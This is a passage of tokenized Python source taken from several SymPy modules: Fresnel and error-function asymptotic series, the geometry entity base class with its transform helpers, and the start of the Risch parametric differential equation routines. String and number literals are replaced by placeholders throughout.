args [ <NUM_LIT:0> ] <EOL> p = [ ( - <NUM_LIT:1> ) ** k * factorial ( <NUM_LIT:4> * k + <NUM_LIT:1> ) / <EOL> ( <NUM_LIT:2> ** ( <NUM_LIT:2> * k + <NUM_LIT:2> ) * z ** ( <NUM_LIT:4> * k + <NUM_LIT:3> ) * <NUM_LIT:2> ** ( <NUM_LIT:2> * k ) * factorial ( <NUM_LIT:2> * k ) ) <EOL> for k in range ( <NUM_LIT:0> , n ) ] <EOL> q = [ <NUM_LIT:1> / ( <NUM_LIT:2> * z ) ] + [ ( - <NUM_LIT:1> ) ** k * factorial ( <NUM_LIT:4> * k - <NUM_LIT:1> ) / <EOL> ( <NUM_LIT:2> ** ( <NUM_LIT:2> * k + <NUM_LIT:1> ) * z ** ( <NUM_LIT:4> * k + <NUM_LIT:1> ) * <NUM_LIT:2> ** ( <NUM_LIT:2> * k - <NUM_LIT:1> ) * factorial ( <NUM_LIT:2> * k - <NUM_LIT:1> ) ) <EOL> for k in range ( <NUM_LIT:1> , n ) ] <EOL> p = [ - sqrt ( <NUM_LIT:2> / pi ) * t for t in p ] + [ Order ( <NUM_LIT:1> / z ** n , x ) ] <EOL> q = [ - sqrt ( <NUM_LIT:2> / pi ) * t for t in q ] + [ Order ( <NUM_LIT:1> / z ** n , x ) ] <EOL> return S . Half + ( sin ( z ** <NUM_LIT:2> ) * Add ( * p ) + cos ( z ** <NUM_LIT:2> ) * Add ( * q ) ) . subs ( x , sqrt ( <NUM_LIT:2> / pi ) * x ) <EOL> return super ( fresnels , self ) . _eval_aseries ( n , args0 , x , logx ) <EOL> class fresnelc ( FresnelIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = cos <EOL> _sign = S . One <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n < <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> if len ( previous_terms ) > <NUM_LIT:1> : <EOL> p = previous_terms [ - <NUM_LIT:1> ] <EOL> return ( - pi ** <NUM_LIT:2> * x ** <NUM_LIT:4> * ( <NUM_LIT:4> * n - <NUM_LIT:3> ) / ( <NUM_LIT:8> * n * ( <NUM_LIT:2> * n - <NUM_LIT:1> ) * ( <NUM_LIT:4> * n + <NUM_LIT:1> ) ) ) * p <EOL> else : <EOL> return x * ( - x ** <NUM_LIT:4> ) ** n * ( S ( <NUM_LIT:2> ) ** ( - <NUM_LIT:2> * n ) * pi ** ( <NUM_LIT:2> * n ) ) / ( ( <NUM_LIT:4> * n + <NUM_LIT:1> ) * factorial ( <NUM_LIT:2> * n ) ) <EOL> def _eval_rewrite_as_erf ( self , z ) : <EOL> return ( S . One - I ) / <NUM_LIT:4> * ( erf ( ( S . 
One + I ) / <NUM_LIT:2> * sqrt ( pi ) * z ) + I * erf ( ( S . One - I ) / <NUM_LIT:2> * sqrt ( pi ) * z ) ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return z * hyper ( [ S . One / <NUM_LIT:4> ] , [ S . One / <NUM_LIT:2> , S ( <NUM_LIT:5> ) / <NUM_LIT:4> ] , - pi ** <NUM_LIT:2> * z ** <NUM_LIT:4> / <NUM_LIT:16> ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return ( pi * z ** ( S ( <NUM_LIT:3> ) / <NUM_LIT:4> ) / ( sqrt ( <NUM_LIT:2> ) * root ( z ** <NUM_LIT:2> , <NUM_LIT:4> ) * root ( - z , <NUM_LIT:4> ) ) <EOL> * meijerg ( [ ] , [ <NUM_LIT:1> ] , [ S ( <NUM_LIT:1> ) / <NUM_LIT:4> ] , [ S ( <NUM_LIT:3> ) / <NUM_LIT:4> , <NUM_LIT:0> ] , - pi ** <NUM_LIT:2> * z ** <NUM_LIT:4> / <NUM_LIT:16> ) ) <EOL> def _eval_aseries ( self , n , args0 , x , logx ) : <EOL> from sympy import Order <EOL> point = args0 [ <NUM_LIT:0> ] <EOL> if point is S . Infinity : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> p = [ ( - <NUM_LIT:1> ) ** k * factorial ( <NUM_LIT:4> * k + <NUM_LIT:1> ) / <EOL> ( <NUM_LIT:2> ** ( <NUM_LIT:2> * k + <NUM_LIT:2> ) * z ** ( <NUM_LIT:4> * k + <NUM_LIT:3> ) * <NUM_LIT:2> ** ( <NUM_LIT:2> * k ) * factorial ( <NUM_LIT:2> * k ) ) <EOL> for k in range ( <NUM_LIT:0> , n ) ] <EOL> q = [ <NUM_LIT:1> / ( <NUM_LIT:2> * z ) ] + [ ( - <NUM_LIT:1> ) ** k * factorial ( <NUM_LIT:4> * k - <NUM_LIT:1> ) / <EOL> ( <NUM_LIT:2> ** ( <NUM_LIT:2> * k + <NUM_LIT:1> ) * z ** ( <NUM_LIT:4> * k + <NUM_LIT:1> ) * <NUM_LIT:2> ** ( <NUM_LIT:2> * k - <NUM_LIT:1> ) * factorial ( <NUM_LIT:2> * k - <NUM_LIT:1> ) ) <EOL> for k in range ( <NUM_LIT:1> , n ) ] <EOL> p = [ - sqrt ( <NUM_LIT:2> / pi ) * t for t in p ] + [ Order ( <NUM_LIT:1> / z ** n , x ) ] <EOL> q = [ sqrt ( <NUM_LIT:2> / pi ) * t for t in q ] + [ Order ( <NUM_LIT:1> / z ** n , x ) ] <EOL> return S . Half + ( cos ( z ** <NUM_LIT:2> ) * Add ( * p ) + sin ( z ** <NUM_LIT:2> ) * Add ( * q ) ) . subs ( x , sqrt ( <NUM_LIT:2> / pi ) * x ) <EOL> return super ( fresnelc , self ) . 
_eval_aseries ( n , args0 , x , logx ) <EOL> class _erfs ( Function ) : <EOL> """<STR_LIT>""" <EOL> def _eval_aseries ( self , n , args0 , x , logx ) : <EOL> from sympy import Order <EOL> point = args0 [ <NUM_LIT:0> ] <EOL> if point is S . Infinity : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> l = [ <NUM_LIT:1> / sqrt ( S . Pi ) * factorial ( <NUM_LIT:2> * k ) * ( - S ( <EOL> <NUM_LIT:4> ) ) ** ( - k ) / factorial ( k ) * ( <NUM_LIT:1> / z ) ** ( <NUM_LIT:2> * k + <NUM_LIT:1> ) for k in range ( <NUM_LIT:0> , n ) ] <EOL> o = Order ( <NUM_LIT:1> / z ** ( <NUM_LIT:2> * n + <NUM_LIT:1> ) , x ) <EOL> return ( Add ( * l ) ) . _eval_nseries ( x , n , logx ) + o <EOL> t = point . extract_multiplicatively ( S . ImaginaryUnit ) <EOL> if t is S . Infinity : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> l = [ <NUM_LIT:1> / sqrt ( S . Pi ) * factorial ( <NUM_LIT:2> * k ) * ( - S ( <EOL> <NUM_LIT:4> ) ) ** ( - k ) / factorial ( k ) * ( <NUM_LIT:1> / z ) ** ( <NUM_LIT:2> * k + <NUM_LIT:1> ) for k in range ( <NUM_LIT:0> , n ) ] <EOL> o = Order ( <NUM_LIT:1> / z ** ( <NUM_LIT:2> * n + <NUM_LIT:1> ) , x ) <EOL> return ( Add ( * l ) ) . _eval_nseries ( x , n , logx ) + o <EOL> return super ( _erfs , self ) . _eval_aseries ( n , args0 , x , logx ) <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> return - <NUM_LIT:2> / sqrt ( S . Pi ) + <NUM_LIT:2> * z * _erfs ( z ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_rewrite_as_intractable ( self , z ) : <EOL> return ( S . One - erf ( z ) ) * exp ( z ** <NUM_LIT:2> ) <EOL> class _eis ( Function ) : <EOL> """<STR_LIT>""" <EOL> def _eval_aseries ( self , n , args0 , x , logx ) : <EOL> from sympy import Order <EOL> if args0 [ <NUM_LIT:0> ] != S . Infinity : <EOL> return super ( _erfs , self ) . _eval_aseries ( n , args0 , x , logx ) <EOL> z = self . 
args [ <NUM_LIT:0> ] <EOL> l = [ factorial ( k ) * ( <NUM_LIT:1> / z ) ** ( k + <NUM_LIT:1> ) for k in range ( <NUM_LIT:0> , n ) ] <EOL> o = Order ( <NUM_LIT:1> / z ** ( n + <NUM_LIT:1> ) , x ) <EOL> return ( Add ( * l ) ) . _eval_nseries ( x , n , logx ) + o <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> return S . One / z - _eis ( z ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_rewrite_as_intractable ( self , z ) : <EOL> return exp ( - z ) * Ei ( z ) <EOL> def _eval_nseries ( self , x , n , logx ) : <EOL> x0 = self . args [ <NUM_LIT:0> ] . limit ( x , <NUM_LIT:0> ) <EOL> if x0 is S . Zero : <EOL> f = self . _eval_rewrite_as_intractable ( * self . args ) <EOL> return f . _eval_nseries ( x , n , logx ) <EOL> return super ( _eis , self ) . _eval_nseries ( x , n , logx ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function <EOL> from sympy . core . compatibility import is_sequence <EOL> from sympy . core . containers import Tuple <EOL> from sympy . core . basic import Basic <EOL> from sympy . core . sympify import sympify <EOL> from sympy . functions import cos , sin <EOL> from sympy . matrices import eye <EOL> from sympy . sets import Set <EOL> ordering_of_classes = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> class GeometryEntity ( Basic ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> def is_seq_and_not_point ( a ) : <EOL> if hasattr ( a , '<STR_LIT>' ) and a . is_Point : <EOL> return False <EOL> return is_sequence ( a ) <EOL> args = [ Tuple ( * a ) if is_seq_and_not_point ( a ) else sympify ( a ) for a in args ] <EOL> return Basic . __new__ ( cls , * args ) <EOL> def _sympy_ ( self ) : <EOL> return self <EOL> def __getnewargs__ ( self ) : <EOL> return tuple ( self . args ) <EOL> def intersection ( self , o ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def rotate ( self , angle , pt = None ) : <EOL> """<STR_LIT>""" <EOL> newargs = [ ] <EOL> for a in self . args : <EOL> if isinstance ( a , GeometryEntity ) : <EOL> newargs . append ( a . rotate ( angle , pt ) ) <EOL> else : <EOL> newargs . append ( a ) <EOL> return type ( self ) ( * newargs ) <EOL> def scale ( self , x = <NUM_LIT:1> , y = <NUM_LIT:1> , pt = None ) : <EOL> """<STR_LIT>""" <EOL> from sympy . geometry . point import Point <EOL> if pt : <EOL> pt = Point ( pt ) <EOL> return self . translate ( * ( - pt ) . args ) . scale ( x , y ) . translate ( * pt . args ) <EOL> return type ( self ) ( * [ a . 
scale ( x , y ) for a in self . args ] ) <EOL> def translate ( self , x = <NUM_LIT:0> , y = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> newargs = [ ] <EOL> for a in self . args : <EOL> if isinstance ( a , GeometryEntity ) : <EOL> newargs . append ( a . translate ( x , y ) ) <EOL> else : <EOL> newargs . append ( a ) <EOL> return self . func ( * newargs ) <EOL> def reflect ( self , line ) : <EOL> from sympy import atan , Point , Dummy , oo <EOL> g = self <EOL> l = line <EOL> o = Point ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> if l . slope == <NUM_LIT:0> : <EOL> y = l . args [ <NUM_LIT:0> ] . y <EOL> if not y : <EOL> return g . scale ( y = - <NUM_LIT:1> ) <EOL> reps = [ ( p , p . translate ( y = <NUM_LIT:2> * ( y - p . y ) ) ) for p in g . atoms ( Point ) ] <EOL> elif l . slope == oo : <EOL> x = l . args [ <NUM_LIT:0> ] . x <EOL> if not x : <EOL> return g . scale ( x = - <NUM_LIT:1> ) <EOL> reps = [ ( p , p . translate ( x = <NUM_LIT:2> * ( x - p . x ) ) ) for p in g . atoms ( Point ) ] <EOL> else : <EOL> if not hasattr ( g , '<STR_LIT>' ) and not all ( <EOL> isinstance ( arg , Point ) for arg in g . args ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' % g ) <EOL> a = atan ( l . slope ) <EOL> c = l . coefficients <EOL> d = - c [ - <NUM_LIT:1> ] / c [ <NUM_LIT:1> ] <EOL> x , y = Dummy ( ) , Dummy ( ) <EOL> xf = Point ( x , y ) <EOL> xf = xf . translate ( y = - d ) . rotate ( - a , o ) . scale ( y = - <NUM_LIT:1> <EOL> ) . rotate ( a , o ) . translate ( y = d ) <EOL> reps = [ ( p , xf . xreplace ( { x : p . x , y : p . y } ) ) for p in g . atoms ( Point ) ] <EOL> return g . xreplace ( dict ( reps ) ) <EOL> def encloses ( self , o ) : <EOL> """<STR_LIT>""" <EOL> from sympy . geometry . point import Point <EOL> from sympy . geometry . line import Segment , Ray , Line <EOL> from sympy . geometry . ellipse import Ellipse <EOL> from sympy . geometry . polygon import Polygon , RegularPolygon <EOL> if isinstance ( o , Point ) : <EOL> return self . 
encloses_point ( o ) <EOL> elif isinstance ( o , Segment ) : <EOL> return all ( self . encloses_point ( x ) for x in o . points ) <EOL> elif isinstance ( o , Ray ) or isinstance ( o , Line ) : <EOL> return False <EOL> elif isinstance ( o , Ellipse ) : <EOL> return self . encloses_point ( o . center ) and not self . intersection ( o ) and self . encloses_point ( Point ( o . center . x + o . hradius , o . center . y ) ) <EOL> elif isinstance ( o , Polygon ) : <EOL> if isinstance ( o , RegularPolygon ) : <EOL> if not self . encloses_point ( o . center ) : <EOL> return False <EOL> return all ( self . encloses_point ( v ) for v in o . vertices ) <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def ambient_dimension ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def bounds ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def is_similar ( self , other ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def equals ( self , o ) : <EOL> return self == o <EOL> def _svg ( self , scale_factor = <NUM_LIT:1.> , fill_color = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _repr_svg_ ( self ) : <EOL> """<STR_LIT>""" <EOL> from sympy . core . evalf import N <EOL> try : <EOL> bounds = self . 
bounds <EOL> except ( NotImplementedError , TypeError ) : <EOL> return None <EOL> svg_top = '''<STR_LIT>''' <EOL> xmin , ymin , xmax , ymax = map ( N , bounds ) <EOL> if xmin == xmax and ymin == ymax : <EOL> xmin , ymin , xmax , ymax = xmin - <NUM_LIT> , ymin - <NUM_LIT> , xmax + <NUM_LIT> , ymax + <NUM_LIT> <EOL> else : <EOL> expand = <NUM_LIT:0.1> <EOL> widest_part = max ( [ xmax - xmin , ymax - ymin ] ) <EOL> expand_amount = widest_part * expand <EOL> xmin -= expand_amount <EOL> ymin -= expand_amount <EOL> xmax += expand_amount <EOL> ymax += expand_amount <EOL> dx = xmax - xmin <EOL> dy = ymax - ymin <EOL> width = min ( [ max ( [ <NUM_LIT> , dx ] ) , <NUM_LIT> ] ) <EOL> height = min ( [ max ( [ <NUM_LIT> , dy ] ) , <NUM_LIT> ] ) <EOL> scale_factor = <NUM_LIT:1.> if max ( width , height ) == <NUM_LIT:0> else max ( dx , dy ) / max ( width , height ) <EOL> try : <EOL> svg = self . _svg ( scale_factor ) <EOL> except ( NotImplementedError , TypeError ) : <EOL> return None <EOL> view_box = "<STR_LIT>" . format ( xmin , ymin , dx , dy ) <EOL> transform = "<STR_LIT>" . format ( ymax + ymin ) <EOL> svg_top = svg_top . format ( view_box , width , height ) <EOL> return svg_top + ( <EOL> '<STR_LIT>' <EOL> ) . format ( transform , svg ) <EOL> def __ne__ ( self , o ) : <EOL> """<STR_LIT>""" <EOL> return not self . __eq__ ( o ) <EOL> def __radd__ ( self , a ) : <EOL> return a . __add__ ( self ) <EOL> def __rsub__ ( self , a ) : <EOL> return a . __sub__ ( self ) <EOL> def __rmul__ ( self , a ) : <EOL> return a . __mul__ ( self ) <EOL> def __rdiv__ ( self , a ) : <EOL> return a . __div__ ( self ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> from sympy . printing import sstr <EOL> return type ( self ) . __name__ + sstr ( self . args ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return type ( self ) . __name__ + repr ( self . args ) <EOL> def __cmp__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> n1 = self . __class__ . __name__ <EOL> n2 = other . 
__class__ . __name__ <EOL> c = ( n1 > n2 ) - ( n1 < n2 ) <EOL> if not c : <EOL> return <NUM_LIT:0> <EOL> i1 = - <NUM_LIT:1> <EOL> for cls in self . __class__ . __mro__ : <EOL> try : <EOL> i1 = ordering_of_classes . index ( cls . __name__ ) <EOL> break <EOL> except ValueError : <EOL> i1 = - <NUM_LIT:1> <EOL> if i1 == - <NUM_LIT:1> : <EOL> return c <EOL> i2 = - <NUM_LIT:1> <EOL> for cls in other . __class__ . __mro__ : <EOL> try : <EOL> i2 = ordering_of_classes . index ( cls . __name__ ) <EOL> break <EOL> except ValueError : <EOL> i2 = - <NUM_LIT:1> <EOL> if i2 == - <NUM_LIT:1> : <EOL> return c <EOL> return ( i1 > i2 ) - ( i1 < i2 ) <EOL> def __contains__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if type ( self ) == type ( other ) : <EOL> return self == other <EOL> raise NotImplementedError ( ) <EOL> def _eval_subs ( self , old , new ) : <EOL> from sympy . geometry . point import Point , Point3D <EOL> if is_sequence ( old ) or is_sequence ( new ) : <EOL> if isinstance ( self , Point3D ) : <EOL> old = Point3D ( old ) <EOL> new = Point3D ( new ) <EOL> else : <EOL> old = Point ( old ) <EOL> new = Point ( new ) <EOL> return self . _subs ( old , new ) <EOL> class GeometrySet ( GeometryEntity , Set ) : <EOL> """<STR_LIT>""" <EOL> def _contains ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) and other . is_FiniteSet : <EOL> return all ( self . __contains__ ( i ) for i in other ) <EOL> return self . __contains__ ( other ) <EOL> def _union ( self , o ) : <EOL> """<STR_LIT>""" <EOL> from sympy . sets import Union , FiniteSet <EOL> if o . is_FiniteSet : <EOL> other_points = [ p for p in o if not self . _contains ( p ) ] <EOL> if len ( other_points ) == len ( o ) : <EOL> return None <EOL> return Union ( self , FiniteSet ( * other_points ) ) <EOL> if self . _contains ( o ) : <EOL> return self <EOL> return None <EOL> def _intersect ( self , o ) : <EOL> """<STR_LIT>""" <EOL> from sympy . sets import Set , FiniteSet , Union <EOL> from sympy . 
geometry import Point <EOL> try : <EOL> inter = self . intersection ( o ) <EOL> except NotImplementedError : <EOL> return None <EOL> points = FiniteSet ( * [ p for p in inter if isinstance ( p , Point ) ] ) <EOL> non_points = [ p for p in inter if not isinstance ( p , Point ) ] <EOL> return Union ( * ( non_points + [ points ] ) ) <EOL> def translate ( x , y ) : <EOL> """<STR_LIT>""" <EOL> rv = eye ( <NUM_LIT:3> ) <EOL> rv [ <NUM_LIT:2> , <NUM_LIT:0> ] = x <EOL> rv [ <NUM_LIT:2> , <NUM_LIT:1> ] = y <EOL> return rv <EOL> def scale ( x , y , pt = None ) : <EOL> """<STR_LIT>""" <EOL> rv = eye ( <NUM_LIT:3> ) <EOL> rv [ <NUM_LIT:0> , <NUM_LIT:0> ] = x <EOL> rv [ <NUM_LIT:1> , <NUM_LIT:1> ] = y <EOL> if pt : <EOL> from sympy . geometry . point import Point <EOL> pt = Point ( pt ) <EOL> tr1 = translate ( * ( - pt ) . args ) <EOL> tr2 = translate ( * pt . args ) <EOL> return tr1 * rv * tr2 <EOL> return rv <EOL> def rotate ( th ) : <EOL> """<STR_LIT>""" <EOL> s = sin ( th ) <EOL> rv = eye ( <NUM_LIT:3> ) * cos ( th ) <EOL> rv [ <NUM_LIT:0> , <NUM_LIT:1> ] = s <EOL> rv [ <NUM_LIT:1> , <NUM_LIT:0> ] = - s <EOL> rv [ <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:1> <EOL> return rv </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core import Dummy , ilcm , Add , Mul , Pow , S <EOL> from sympy . matrices import Matrix , zeros , eye <EOL> from sympy . solvers import solve <EOL> from sympy . polys import Poly , lcm , cancel , sqf_list <EOL> from sympy . integrals . risch import ( gcdex_diophantine , frac_in , derivation , <EOL> NonElementaryIntegralException , residue_reduce , splitfactor , <EOL> residue_reduce_derivation , DecrementLevel , recognize_log_derivative ) <EOL> from sympy . integrals . rde import ( order_at , order_at_oo , weak_normalizer , <EOL> bound_degree , spde , solve_poly_rde ) <EOL> from sympy . core . compatibility import reduce , range <EOL> from sympy . utilities . misc import debug <EOL> def prde_normal_denom ( fa , fd , G , DE ) : <EOL> """<STR_LIT>""" <EOL> dn , ds = splitfactor ( fd , DE ) <EOL> Gas , Gds = list ( zip ( * G ) ) <EOL> gd = reduce ( lambda i , j : i . lcm ( j ) , Gds , Poly ( <NUM_LIT:1> , DE . t ) ) <EOL> en , es = splitfactor ( gd , DE ) <EOL> p = dn . gcd ( en ) <EOL> h = en . gcd ( en . diff ( DE . t ) ) . quo ( p . gcd ( p . diff ( DE . t ) ) ) <EOL> a = dn * h <EOL> c = a * h <EOL> ba = a * fa - dn * derivation ( h , DE ) * fd <EOL> ba , bd = ba . cancel ( fd , include = True ) <EOL> G = [ ( c * A ) . cancel ( D , include = True ) for A , D in G ] <EOL> return ( a , ( ba , bd ) , G , h ) <EOL> def real_imag ( ba , bd , gen ) : <EOL> """<STR_LIT>""" <EOL> bd = bd . as_poly ( gen ) . as_dict ( ) <EOL> ba = ba . as_poly ( gen ) . as_dict ( ) <EOL> denom_real = [ value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:0> else - value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:2> else <NUM_LIT:0> for key , value in bd . items ( ) ] <EOL> denom_imag = [ value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:1> else - value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:3> else <NUM_LIT:0> for key , value in bd . 
items ( ) ] <EOL> bd_real = sum ( r for r in denom_real ) <EOL> bd_imag = sum ( r for r in denom_imag ) <EOL> num_real = [ value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:0> else - value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:2> else <NUM_LIT:0> for key , value in ba . items ( ) ] <EOL> num_imag = [ value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:1> else - value if key [ <NUM_LIT:0> ] % <NUM_LIT:4> == <NUM_LIT:3> else <NUM_LIT:0> for key , value in ba . items ( ) ] <EOL> ba_real = sum ( r for r in num_real ) <EOL> ba_imag = sum ( r for r in num_imag ) <EOL> ba = ( ( ba_real * bd_real + ba_imag * bd_imag ) . as_poly ( gen ) , ( ba_imag * bd_real - ba_real * bd_imag ) . as_poly ( gen ) ) <EOL> bd = ( bd_real * bd_real + bd_imag * bd_imag ) . as_poly ( gen ) <EOL> return ( ba [ <NUM_LIT:0> ] , ba [ <NUM_LIT:1> ] , bd ) <EOL> def prde_special_denom ( a , ba , bd , G , DE , case = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if case == '<STR_LIT>' : <EOL> case = DE . case <EOL> if case == '<STR_LIT>' : <EOL> p = Poly ( DE . t , DE . t ) <EOL> elif case == '<STR_LIT>' : <EOL> p = Poly ( DE . t ** <NUM_LIT:2> + <NUM_LIT:1> , DE . t ) <EOL> elif case in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> B = ba . quo ( bd ) <EOL> return ( a , B , G , Poly ( <NUM_LIT:1> , DE . t ) ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % case ) <EOL> nb = order_at ( ba , p , DE . t ) - order_at ( bd , p , DE . t ) <EOL> nc = min ( [ order_at ( Ga , p , DE . t ) - order_at ( Gd , p , DE . t ) for Ga , Gd in G ] ) <EOL> n = min ( <NUM_LIT:0> , nc - min ( <NUM_LIT:0> , nb ) ) <EOL> if not nb : <EOL> if case == '<STR_LIT>' : <EOL> dcoeff = DE . d . quo ( Poly ( DE . t , DE . t ) ) <EOL> with DecrementLevel ( DE ) : <EOL> alphaa , alphad = frac_in ( - ba . eval ( <NUM_LIT:0> ) / bd . eval ( <NUM_LIT:0> ) / a . eval ( <NUM_LIT:0> ) , DE . t ) <EOL> etaa , etad = frac_in ( dcoeff , DE . 
t ) <EOL> A = parametric_log_deriv ( alphaa , alphad , etaa , etad , DE ) <EOL> if A is not None : <EOL> a , m , z = A <EOL> if a == <NUM_LIT:1> : <EOL> n = min ( n , m ) <EOL> elif case == '<STR_LIT>' : <EOL> dcoeff = DE . d . quo ( Poly ( DE . t ** <NUM_LIT:2> + <NUM_LIT:1> , DE . t ) ) <EOL> with DecrementLevel ( DE ) : <EOL> betaa , alphaa , alphad = real_imag ( ba , bd * a , DE . t ) <EOL> betad = alphad <EOL> etaa , etad = frac_in ( dcoeff , DE . t ) <EOL> if recognize_log_derivative ( <NUM_LIT:2> * betaa , betad , DE ) : <EOL> A = parametric_log_deriv ( alphaa , alphad , etaa , etad , DE ) <EOL> B = parametric_log_deriv ( betaa , betad , etaa , etad , DE ) <EOL> if A is not None and B is not None : <EOL> a , s , z = A <EOL> if a == <NUM_LIT:1> : <EOL> n = min ( n , s / <NUM_LIT:2> ) <EOL> N = max ( <NUM_LIT:0> , - nb ) <EOL> pN = p ** N <EOL> pn = p ** - n <EOL> A = a * pN <EOL> B = ba * pN . quo ( bd ) + Poly ( n , DE . t ) * a * derivation ( p , DE ) . quo ( p ) * pN <EOL> G = [ ( Ga * pN * pn ) . cancel ( Gd , include = True ) for Ga , Gd in G ] <EOL> h = pn <EOL> return ( A , B , G , h ) <EOL> def prde_linear_constraints ( a , b , G , DE ) : <EOL> """<STR_LIT>""" <EOL> m = len ( G ) <EOL> Gns , Gds = list ( zip ( * G ) ) <EOL> d = reduce ( lambda i , j : i . lcm ( j ) , Gds ) <EOL> d = Poly ( d , field = True ) <EOL> Q = [ ( ga * ( d ) . quo ( gd ) ) . div ( d ) for ga , gd in G ] <EOL> if not all ( [ ri . is_zero for _ , ri in Q ] ) : <EOL> N = max ( [ ri . degree ( DE . t ) for _ , ri in Q ] ) <EOL> M = Matrix ( N + <NUM_LIT:1> , m , lambda i , j : Q [ j ] [ <NUM_LIT:1> ] . nth ( i ) ) <EOL> else : <EOL> M = Matrix ( ) <EOL> qs , _ = list ( zip ( * Q ) ) <EOL> return ( qs , M ) <EOL> def constant_system ( A , u , DE ) : <EOL> """<STR_LIT>""" <EOL> if not A : <EOL> return A , u <EOL> Au = A . row_join ( u ) <EOL> Au = Au . rref ( simplify = cancel ) [ <NUM_LIT:0> ] <EOL> Au = Au . 
applyfunc ( cancel ) <EOL> A , u = Au [ : , : - <NUM_LIT:1> ] , Au [ : , - <NUM_LIT:1> ] <EOL> for j in range ( A . cols ) : <EOL> for i in range ( A . rows ) : <EOL> if A [ i , j ] . has ( * DE . T ) : <EOL> Ri = A [ i , : ] <EOL> Rm1 = Ri . applyfunc ( lambda x : derivation ( x , DE , basic = True ) / <EOL> derivation ( A [ i , j ] , DE , basic = True ) ) <EOL> Rm1 = Rm1 . applyfunc ( cancel ) <EOL> um1 = cancel ( derivation ( u [ i ] , DE , basic = True ) / <EOL> derivation ( A [ i , j ] , DE , basic = True ) ) <EOL> for s in range ( A . rows ) : <EOL> Asj = A [ s , j ] <EOL> A . row_op ( s , lambda r , jj : cancel ( r - Asj * Rm1 [ jj ] ) ) <EOL> u . row_op ( s , lambda r , jj : cancel ( r - Asj * um1 ) ) <EOL> A = A . col_join ( Rm1 ) <EOL> u = u . col_join ( Matrix ( [ um1 ] ) ) <EOL> return ( A , u ) <EOL> def prde_spde ( a , b , Q , n , DE ) : <EOL> """<STR_LIT>""" <EOL> R , Z = list ( zip ( * [ gcdex_diophantine ( b , a , qi ) for qi in Q ] ) ) <EOL> A = a <EOL> B = b + derivation ( a , DE ) <EOL> Qq = [ zi - derivation ( ri , DE ) for ri , zi in zip ( R , Z ) ] <EOL> R = list ( R ) <EOL> n1 = n - a . degree ( DE . t ) <EOL> return ( A , B , Qq , R , n1 ) <EOL> def prde_no_cancel_b_large ( b , Q , n , DE ) : <EOL> """<STR_LIT>""" <EOL> db = b . degree ( DE . t ) <EOL> m = len ( Q ) <EOL> H = [ Poly ( <NUM_LIT:0> , DE . t ) ] * m <EOL> for N in range ( n , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> for i in range ( m ) : <EOL> si = Q [ i ] . nth ( N + db ) / b . LC ( ) <EOL> sitn = Poly ( si * DE . t ** N , DE . t ) <EOL> H [ i ] = H [ i ] + sitn <EOL> Q [ i ] = Q [ i ] - derivation ( sitn , DE ) - b * sitn <EOL> if all ( qi . is_zero for qi in Q ) : <EOL> dc = - <NUM_LIT:1> <EOL> M = zeros ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> else : <EOL> dc = max ( [ qi . degree ( t ) for 